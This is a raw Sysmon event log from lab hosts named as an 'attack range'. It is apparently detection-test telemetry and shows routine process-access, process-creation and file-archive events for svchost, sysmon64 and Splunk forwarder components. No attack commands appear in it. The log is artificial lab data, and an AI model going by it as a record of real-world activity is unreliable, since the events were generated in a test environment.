14:15:50.932{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043854Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.932{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043853Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.932{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043852Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.932{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043851Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.932{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043850Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.932{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043849Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.932{0A5DF930-E35B-6299-0500-000000006002}4121840C:\Windows\system32\csrss.exe{0A5DF930-1796-629A-0A07-000000006002}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043848Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.932{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1796-629A-0A07-000000006002}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043847Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.933{0A5DF930-1796-629A-0A07-000000006002}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000043846Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.432{0A5DF930-1796-629A-0907-000000006002}30241880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043845Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.261{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1796-629A-0907-000000006002}3024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043844Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.261{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043843Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.261{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043842Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.261{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043841Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.261{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043840Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.261{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043839Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.261{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043838Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.261{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043837Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.261{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043836Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.261{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043835Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.261{0A5DF930-E35B-6299-0500-000000006002}4121840C:\Windows\system32\csrss.exe{0A5DF930-1796-629A-0907-000000006002}3024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043834Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.261{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1796-629A-0907-000000006002}3024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043833Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.261{0A5DF930-1796-629A-0907-000000006002}3024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000043832Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.073{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A01BCF1069EC07C5F8AF5A030F45F6A3,SHA256=CE287BFD913007B2407A6DC045C669515BCC0A288278F773E9043DAE45764DBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:51.186{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D838BC67C7EFBC875B31597E10A83EE,SHA256=BED0D082800D3B35DA6E5D775ED6A625F4DFC0AAE9B7812215AFE3D1C1AE713D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000043875Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:51.589{0A5DF930-1797-629A-0B07-000000006002}20643468C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043874Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:51.432{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1797-629A-0B07-000000006002}2064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043873Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:51.432{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043872Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 